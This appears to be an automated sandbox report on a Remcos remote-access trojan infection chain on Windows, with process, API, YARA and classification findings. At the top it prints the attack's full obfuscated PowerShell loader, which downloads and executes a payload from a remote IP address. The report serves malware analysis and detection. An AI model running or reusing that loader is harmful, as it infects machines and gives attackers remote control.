Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"			Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00418267 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetLastError,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	8_2_00418267
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle,	8_2_0041C077
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle,	8_2_0041C0A3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	9_2_0040BAE3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004016FD NtdllDefWindowProc_A,	10_2_004016FD
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004017B7 NtdllDefWindowProc_A,	10_2_004017B7
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00402CAC NtdllDefWindowProc_A,	11_2_00402CAC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00402D66 NtdllDefWindowProc_A,	11_2_00402D66

Contains functionality to shutdown / reboot the system

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress,

8_2_00416861

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_03286580	5_2_03286580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_03287960	5_2_03287960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0042809D	8_2_0042809D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0045412B	8_2_0045412B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004421C0	8_2_004421C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004281D7	8_2_004281D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043E1E0	8_2_0043E1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041E29B	8_2_0041E29B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004373DA	8_2_004373DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00438380	8_2_00438380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00453472	8_2_00453472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0042747E	8_2_0042747E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043E43D	8_2_0043E43D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004325A1	8_2_004325A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043774C	8_2_0043774C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041F809	8_2_0041F809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004379F6	8_2_004379F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004279F5	8_2_004279F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0044DAD9	8_2_0044DAD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00433C73	8_2_00433C73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00413CA0	8_2_00413CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00437CBD	8_2_00437CBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043DD82	8_2_0043DD82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00435F52	8_2_00435F52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00437F78	8_2_00437F78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043DFB1	8_2_0043DFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10017194	8_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_1000B5C1	8_2_1000B5C1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044A030	9_2_0044A030
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040612B	9_2_0040612B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0043E13D	9_2_0043E13D
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044B188	9_2_0044B188
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00442273	9_2_00442273
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044D380	9_2_0044D380
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044A5F0	9_2_0044A5F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004125F6	9_2_004125F6
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004065BF	9_2_004065BF
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004086CB	9_2_004086CB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004066BC	9_2_004066BC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044D760	9_2_0044D760
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405A40	9_2_00405A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00449A40	9_2_00449A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405AB1	9_2_00405AB1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405B22	9_2_00405B22
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044ABC0	9_2_0044ABC0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405BB3	9_2_00405BB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00417C60	9_2_00417C60
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044CC70	9_2_0044CC70
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00418CC9	9_2_00418CC9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044CDFB	9_2_0044CDFB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044CDA0	9_2_0044CDA0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044AE20	9_2_0044AE20
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00415E3E	9_2_00415E3E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00437F3B	9_2_00437F3B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00405038	10_2_00405038
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0041208C	10_2_0041208C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004050A9	10_2_004050A9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0040511A	10_2_0040511A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0043C13A	10_2_0043C13A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004051AB	10_2_004051AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00449300	10_2_00449300
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0040D322	10_2_0040D322
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044A4F0	10_2_0044A4F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0043A5AB	10_2_0043A5AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00413631	10_2_00413631
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00446690	10_2_00446690
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044A730	10_2_0044A730
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004398D8	10_2_004398D8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004498E0	10_2_004498E0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044A886	10_2_0044A886
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0043DA09	10_2_0043DA09
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00438D5E	10_2_00438D5E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00449ED0	10_2_00449ED0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0041FE83	10_2_0041FE83
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00430F54	10_2_00430F54
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004050C2	11_2_004050C2
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004014AB	11_2_004014AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00405133	11_2_00405133
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004051A4	11_2_004051A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00401246	11_2_00401246
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_0040CA46	11_2_0040CA46
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00405235	11_2_00405235
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004032C8	11_2_004032C8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00401689	11_2_00401689
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00402F60	11_2_00402F60

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004351E0 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00434ACF appears 43 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00401F96 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00401EBF appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00402117 appears 41 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 0044DDB0 appears 33 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00418555 appears 34 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004186B6 appears 58 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004188FE appears 88 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00413025 appears 79 times

Searches for the Microsoft Outlook file path

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2845
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2845			Jump to behavior

Yara signature match

Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winHTA@23/16@4/7

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

9_2_0041A225

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		8_2_00417AD9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,		11_2_00410DE1

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

9_2_0041A6AF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0040C03C GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

8_2_0040C03C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource,

8_2_0041B9AB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

8_2_0041AC43

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\0[1].txt

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
